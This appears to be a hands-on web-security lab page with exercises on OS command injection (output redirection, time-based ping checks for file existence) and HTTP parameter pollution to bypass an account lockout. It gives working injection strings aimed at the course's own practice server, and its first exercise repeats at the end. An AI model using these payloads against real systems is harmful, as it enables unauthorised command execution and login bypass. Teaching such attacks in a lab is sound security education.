1. Side-Channel Network Test Target: Goal: View output of "ls" Solution google.com | ls > /var/www/html/YOURNAME.htm Then view https://attack.samsclass.info/YOURNAME.htm

2. Time-Based Network Test Target: Goal: Determine if a file named "/tmp/flag" exists Injections to Try google.com | ls > /var/www/html/YOURNAME.htm Fails because < and > are filtered. google.com | if [ -f /tmp/flag ]; then ping -c 10 127.0.0.1; fi;ls Fast because the file doesn't exist google.com | if [ -f /tmp/netok ]; then ping -c 10 127.0.0.1; fi;ls Slow because the file does exist Challenge 2a (10 pts. extra credit) There is a file in /usr/local/secret with a one-digit filename between 0 and 9. Find that filename. Challenge 2b (10 pts. extra credit) There is a file in /usr/local/secret with a three-digit filename between 000 and 999. Find that filename. Challenge 2c (10 pts. extra credit) There is a file in /usr/local/secret with a nine-digit filename between 000000000 and 999999999. Find that filename.

3. HTTP Parameter Pollution Log In Username: Password: The administrator punished wally for using a password of "wally" by locking his accout out. Goal: Sign in as "wally" anyway. Solution Log in with this username: wally&lockout=0 The URL becomes this, and the second parameter assignment wins on my server. https://attack.samsclass.info/hpp1b.php?lockout=1&username=wally&lockout=0&password=wally

1. Side-Channel Network Test Target: Goal: View output of "ls" Solution google.com | ls > /var/www/html/YOURNAME.htm Then view https://attack.samsclass.info/YOURNAME.htm